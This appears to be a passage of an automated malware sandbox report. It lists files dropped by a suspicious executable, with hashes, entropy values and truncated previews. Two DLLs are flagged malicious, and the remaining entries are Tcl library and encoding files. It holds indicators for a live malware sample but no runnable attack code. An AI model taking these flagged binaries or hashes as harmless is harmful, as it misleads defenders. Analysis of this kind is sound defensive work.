                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):83736
                                                                                                                                                                                                                              Entropy (8bit):6.31969940395018
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:COYhekrkJqlerLSyypHi9/s+S+pzjii/n1IsJqKNBI1Lw9PD7Sy9duxJ:jwkJqHyypHi9/sT+pzjiE1IwdNBI1LwU
                                                                                                                                                                                                                              MD5:E43AED7D6A8BCD9DDFC59C2D1A2C4B02
                                                                                                                                                                                                                              SHA1:36F367F68FB9868412246725B604B27B5019D747
                                                                                                                                                                                                                              SHA-256:2C2A6A6BA360E38F0C2B5A53B4626F833A3111844D95615EBF35BE0E76B1EF7A
                                                                                                                                                                                                                              SHA-512:D92E26EB88DB891DE389A464F850A8DA0A39AF8A4D86D9894768CB97182B8351817CE14FE1EB8301B18B80D1D5D8876A48BA66EB7B874C7C3D7B009FCDBC8C4E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d......f.........." ...(.x..........0-.......................................`......@.....`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178456
                                                                                                                                                                                                                              Entropy (8bit):5.974570300962832
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:ZmkiCZfBmvD1ZLnM2Yfp6XSVJLX2GvMf1ba+VRJNI7IM/H9o/PCrXuI3JtI1C7lD:xiC5QD1dwp6XSxMfjTwJxd
                                                                                                                                                                                                                              MD5:6A2B0F8F50B47D05F96DEFF7883C1270
                                                                                                                                                                                                                              SHA1:2B1AEB6FE9A12E0D527B042512FC8890EEDB10D8
                                                                                                                                                                                                                              SHA-256:68DAD60FF6FB36C88EF1C47D1855517BFE8DE0F5DDEA0F630B65B622A645D53A
                                                                                                                                                                                                                              SHA-512:A080190D4E7E1ABB186776AE6E83DAB4B21A77093A88FCA59CE1F63C683F549A28D094818A0EE44186DDEA2095111F1879008C0D631FC4A8D69DD596EF76CA37
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..`...`...`......`./ia...`./ic...`./id...`./ie...`..na...`..ja...`...a.u.`...a...`..nm...`..n`...`..n....`..nb...`.Rich..`.........PE..d......f.........." ...(.............,....................................................`.............................................d...D...................P......../......x.......T...........................@...@............................................text............................... ..`.rdata...#.......$..................@..@.data...p...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21523
                                                                                                                                                                                                                              Entropy (8bit):4.827830596623684
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:UqT9XC9VZv9QXCTxsCTHI7672ORgS0mzBvxFRTX7Xvt3wBTnFXhCUvuyqz:LT9XC9VZviXCVsCLI7JlmzBvTxvt3gTW
                                                                                                                                                                                                                              MD5:08EDF746B4A088CB4185C165177BD604
                                                                                                                                                                                                                              SHA1:395CDA114F23E513EEF4618DA39BB86D034124BF
                                                                                                                                                                                                                              SHA-256:517204EE436D08EFC287ABC97433C3BFFCAF42EC6592A3009B9FD3B985AD772C
                                                                                                                                                                                                                              SHA-512:C1727E265A6B0B54773C886A1BCE73512E799BA81A4FCEEEB84CDC33F5505A5E0984E96326A78C46BF142BC4652A80E213886F60EB54ADF92E4DFFE953C87F6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# auto.tcl --..#..# utility procs formerly in init.tcl dealing with auto execution of commands..# and can be auto loaded themselves...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# auto_reset --..#..# Destroy all cached information for auto-loading and auto-execution, so that..# the information gets recomputed the next time it's needed. Also delete any..# commands that are listed in the auto-load index...#..# Arguments:..# None.....proc auto_reset {} {.. global auto_execs auto_index auto_path.. if {[array exists auto_index]} {...foreach cmdName [array names auto_index] {... set fqcn [namespace which $cmdName]... if {$fqcn eq ""} {....continue... }... rename $fqcn {}...}.. }.. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath.. if {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):133439
                                                                                                                                                                                                                              Entropy (8bit):5.044814789288095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Cbn4IAhYvuCg9epsArAzqpSMpWzP7ejMiIAxBPqGYkPAPaZpHYM8EN4LhVLlarXL:Cbn4IM9epsArSqpSMpWzP7ejM/eBPqG3
                                                                                                                                                                                                                              MD5:88BB44A1364147FDD80F9FD78FBCEF61
                                                                                                                                                                                                                              SHA1:2C3454D2669F0CA83FECF17976D599C85B86E615
                                                                                                                                                                                                                              SHA-256:1947F8B188AB4AB6AA72EA68A58D2D9ADD0894FDF320F6B074EAE0F198368FB7
                                                                                                                                                                                                                              SHA-512:010B13E8A2D50521B5D7ADCC5F32F7CDE3F12E1053961C575D967DC6CFD368640BF45D23832E5E9C3868CDCA9FE0505698F949C5557D4169353634C94AA196B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#----------------------------------------------------------------------..#..# clock.tcl --..#..#.This file implements the portions of the [clock] ensemble that are..#.coded in Tcl. Refer to the users' manual to see the description of..#.the [clock] command and its subcommands...#..#..#----------------------------------------------------------------------..#..# Copyright (c) 2004-2007 Kevin B. Kenny..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#----------------------------------------------------------------------....# We must have message catalogs that support the root locale, and we need..# access to the Registry on Windows systems.....uplevel \#0 {.. package require msgcat 1.6.. if { $::tcl_platform(platform) eq {windows} } {...if { [catch { package require registry 1.1 }] } {... namespace eval ::tcl::clock [list variable NoRegistry {}]...}.. }..}....# Put the library directory in
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):2.1033474959326957
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:5c2VBUvEWVrVJ/eyN9j2iV2NdWWT0VbusV7EV7KVAMmVZyd851VFpsGkliX:5HVBUlJvRj7SOVbusZhAMiZyi77qsX
                                                                                                                                                                                                                              MD5:9E3A454FA480E9A99D2D5ACDAA775233
                                                                                                                                                                                                                              SHA1:493637BB570A5C96BB62F998BD0391FB59AFC5F0
                                                                                                                                                                                                                              SHA-256:FB87BF197F4F485B08EA81F7534BC07D9C3A538D022424BE11011A1FE3C413FD
                                                                                                                                                                                                                              SHA-512:EDFCB2BB6AB052D28D5CEBD08AD57F36D3A4CB83D557B1359B0ADE1266E24D8F3CE87B8240881396A5BA4FB45F8B74014784E8885CDB86680D98977CC0D130F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: ascii, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):94389
                                                                                                                                                                                                                              Entropy (8bit):3.3217406555698195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:UAHU3LIkZlmXrd/uQ0ao98zgKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fd:UVduBGf94gFMT6q95GDRBfd
                                                                                                                                                                                                                              MD5:41A874778111CC218BD421CF9C795EC2
                                                                                                                                                                                                                              SHA1:80857D106F71199CE187833D38DB091A819A520C
                                                                                                                                                                                                                              SHA-256:AD1ED201B69855BFD353BF969DFC55576DA35A963ABF1BF7FC6D8B5142A61A61
                                                                                                                                                                                                                              SHA-512:4244624124F86A3EFAB4C70B115A46C8ADF02D708860FA5F327CDBFA24BC3F9EFAD0C6EE58DE96B0B6BBC4CF6D99B322BB8657129007C86D6482F41C1503AAD4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: big5, multi-byte..M..003F 0 89..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98634
                                                                                                                                                                                                                              Entropy (8bit):2.438904802083714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:MPFOsOKqBLPf62X4lgQeLHj6RHUn0TQb8G47Ianrd28gr:MPAsknjX4OQe7aoMMarAFr
                                                                                                                                                                                                                              MD5:B6A7C59E6A48D91CC2DBCB2BBA7E4510
                                                                                                                                                                                                                              SHA1:16A9338F18202B26981F2028BEA412DD03BB0FF2
                                                                                                                                                                                                                              SHA-256:8924545CC92584169138AADB64683C07BBF846A57014C2E668D23B63F43F3610
                                                                                                                                                                                                                              SHA-512:3D644CF394A528A8699BE3679F787A4E1DAD657C04B810580A4C520F2C043471640FBE080AC46DFD3924C47A73BEE12A6AC69D291D09EB791AD0D64A73750B43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cns11643, double-byte..D..2134 0 93..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00004E284E364E3F4E854E054E04518251965338536953B64E2A4E874E4951E2..4E464E8F4EBC4EBE516651E35204529C53B95902590A5B805DDB5E7A5E7F5EF4..5F505F515F61961D4E3C4E634E624EA351854EC54ECF4ECE4ECC518451865722..572351E45205529E529D52FD5300533A5C735346535D538653B7620953CC6C15..53CE57216C3F5E005F0C623762386534653565E04F0E738D4E974EE04F144EF1..4EE74EF74EE64F1D4F024F054F2256D8518B518C519951E55213520B52A60000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.3578844928761034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CqHVBUlJvRj7SOVbusZhAMiZyi77q8ujr4z8tjsuVO6ys2K:JMlBVnrAMiwMm8ujr4z8emTys2K
                                                                                                                                                                                                                              MD5:9568EDE60D3F917F1671F5A625A801C4
                                                                                                                                                                                                                              SHA1:4F5B3308FE7F6845B46779DECF9B395E47AC7396
                                                                                                                                                                                                                              SHA-256:E2991A6F7A7A4D8D3C4C97947298FD5BACB3EAA2F898CEE17F5E21A9861B9626
                                                                                                                                                                                                                              SHA-512:9C32BE3E25FC2211CE91F7B9AE1F9EBA20071272BE2BBBA63A8B6E3CD6543C4C32CD62C4C4D153C94F5BE212E974A61EEFD70DDC005F1688D09D9D56E8E298A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1250, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E2026202020210088203001602039015A0164017D0179..009020182019201C201D202220132014009821220161203A015B0165017E017A..00A002C702D8014100A4010400A600A700A800A9015E00AB00AC00AD00AE017B..00B000B102DB014200B400B500B600B700B80105015F00BB013D02DD013E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.358948900439905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CTHVBUlJvRj7SOVbusZhAMiZyi77qpREwKsF/+++SAJlz9aRme3cJI:wMlBVnrAMiwMmpKwKm/EYnsJI
                                                                                                                                                                                                                              MD5:83DAF47FD1F87B7B1E9E086F14C39E5B
                                                                                                                                                                                                                              SHA1:77AE330512EBFEF430A02213644BD1CFCE174298
                                                                                                                                                                                                                              SHA-256:0AA66DFF8A7AE570FEE83A803F8F5391D9F0C9BD6311796592D9B6E8E36BE6FC
                                                                                                                                                                                                                              SHA-512:D7CE2F44EDFE1DA6D3E07E9A41BB08AD42430BAAFADD09FD217F4B524323A01A1F4913B640C552D38AAEBFF75B0D50ED7A813A2A57C4019311158890C0162DF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1251, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..04020403201A0453201E20262020202120AC203004092039040A040C040B040F..045220182019201C201D202220132014009821220459203A045A045C045B045F..00A0040E045E040800A4049000A600A7040100A9040400AB00AC00AD00AE0407..00B000B104060456049100B500B600B704512116045400BB0458040504550457..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..043004310432043304340
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.292994562910468
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:C4HVBUlJvRj7SOVbusZhAMiZyi77qdmV/rcwvGNNlkL+rSMH+tKv:rMlBVnrAMiwMmd2r/okLz0
                                                                                                                                                                                                                              MD5:E9117326C06FEE02C478027CB625C7D8
                                                                                                                                                                                                                              SHA1:2ED4092D573289925A5B71625CF43CC82B901DAF
                                                                                                                                                                                                                              SHA-256:741859CF238C3A63BBB20EC6ED51E46451372BB221CFFF438297D261D0561C2E
                                                                                                                                                                                                                              SHA-512:D0A39BC41ADC32F2F20B1A0EBAD33BF48DFA6ED5CC1D8F92700CDD431DB6C794C09D9F08BB5709B394ACF54116C3A1E060E2ABCC6B503E1501F8364D3EEBCD52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1252, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D017D008F..009020182019201C201D20222013201402DC21220161203A0153009D017E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.422723556981327
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CRHVBUlJvRj7SOVbusZhAMiZyi77qduWn4T5K9QQSqiWeIDDdn:CMlBVnrAMiwMmduWnSKyQSqiWeIVn
                                                                                                                                                                                                                              MD5:441B86A0DE77F25C91DF1CD4685F651D
                                                                                                                                                                                                                              SHA1:D1E429916BC9423F55EEC8F17941521E9FE9D32B
                                                                                                                                                                                                                              SHA-256:5B8D47451F847C1BDE12CACA3739CA29860553C0B6399EE990D51B26F9A69722
                                                                                                                                                                                                                              SHA-512:35DF342DDA4E8790C6D53762465DF8B93B49B7B7E211D7A5753078EF559C9C9383EFF7285A90FF5C0020FBB16AF380EE3C8643F4CEB1E41917E72021079D722F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1253, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202100882030008A2039008C008D008E008F..009020182019201C201D20222013201400982122009A203A009C009D009E009F..00A00385038600A300A400A500A600A700A800A9000000AB00AC00AD00AE2015..00B000B100B200B3038400B500B600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303B40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.307590929679485
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CWHVBUlJvRj7SOVbusZhAMiZyi77qdjrcFvGNNlkBSMH+tA/b:lMlBVnrAMiwMmdjriokgzAD
                                                                                                                                                                                                                              MD5:5FA9162BEC5A4DEA97B5EA2840CFB065
                                                                                                                                                                                                                              SHA1:F26858E3D2FB928F39CA87CBB8446AF099570CAD
                                                                                                                                                                                                                              SHA-256:31639CA96A4D3602D59BD012540FE179917E0561CB11A0D0B61F1B950EB76911
                                                                                                                                                                                                                              SHA-512:3CE7BEABBE1A0CB946149D263D3317A8B791F6D72C49DEC4621E27F50CC359D8FA3EE97C03FF05D44E47DAA59DB87F219386467614B8B3FF8CC21AB3E3BED5E6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1254, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D008E008F..009020182019201C201D20222013201402DC21220161203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.3385880810272774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CfHVBUlJvRj7SOVbusZhAMiZyi77qdIn2hEeGlRhv6Mw6Kcv:MMlBVnrAMiwMmdInSEdhvrj7
                                                                                                                                                                                                                              MD5:6DEA4179969D6C81C66C3B0F91B39769
                                                                                                                                                                                                                              SHA1:7E2722576BFFABC3258C5EDB2D99FA2468D6A4B0
                                                                                                                                                                                                                              SHA-256:47576CAE321C80E69C7F35205639680BF28010111E86E228ED191B084FAC6B91
                                                                                                                                                                                                                              SHA-512:91CC626B6454517F06FB3616E9ED623D1A2A4BFE74AFA9885F00F6AEC835D8825A5587091B9D9AB0E5ABDA291FA3FE7CE87E2618E21EB2974D9118AE27B8A2FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1255, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A2039008C008D008E008F..009020182019201C201D20222013201402DC2122009A203A009C009D009E009F..00A000A100A200A320AA00A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE00BF..05B005B105B205B305B405B505B605B705B805B9000005BB05BC05BD05BE05BF..05C005C105C205C305F005F105F205F305F40000000000000000000000000000..05D005D105D205D305D40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.4033510023542655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:C0HVBUlJvRj7SOVbusZhAMiZyi77q30pPE7Lym4cwGm+AMZjyG/JQIG/Y:XMlBVnrAMiwMm30FQLym4ys6Jg/Y
                                                                                                                                                                                                                              MD5:D50DFAFEE5C605C5C00A25A9EEE4D4CF
                                                                                                                                                                                                                              SHA1:7D51BC17931D3D809716C06E7F07C6011286A144
                                                                                                                                                                                                                              SHA-256:29340EA8E5AD3532BF67FA77CC852F055081B1238925CB109908AA72804CCC04
                                                                                                                                                                                                                              SHA-512:D0A9B422A1061D6239E442767069B987E33239FCBA9BACE677923888F5F8BD1DCAABC71B83A985A0A86A15DCC44316781665BBFBF24558FCB94FDA6783285BCB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1256, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC067E201A0192201E20262020202102C62030067920390152068606980688..06AF20182019201C201D20222013201406A921220691203A0153200C200D06BA..00A0060C00A200A300A400A500A600A700A800A906BE00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B9061B00BB00BC00BD00BE061F..06C1062106220623062406250626062706280629062A062B062C062D062E062F..063006310632063306340635063600D7063706380639063A0640064106420643..00E0064400E2064506460
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.344584404753015
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CNHVBUlJvRj7SOVbusZhAMiZyi77q8uWTfNL4wIBUioGndt:uMlBVnrAMiwMm8uWJDNIt
                                                                                                                                                                                                                              MD5:CC3D24543FDD4644BBBD4AAB30CA71BC
                                                                                                                                                                                                                              SHA1:8E2658E7F782F005411BCB8423BDFC3C68BDED14
                                                                                                                                                                                                                              SHA-256:C15AB85438728BF2C60D72B1A66AF80E8B1CE3CF5EB08BA6421FF1B2F73ACDF4
                                                                                                                                                                                                                              SHA-512:5ECABF820098F7D24AB806ADD9CA3E1087C29914FB2DE6BA3DC656234202DE3FDF80A7E9ED433CCB2149FF07184F74884CEB37A1B689E9E0C1402916F3E13AFE
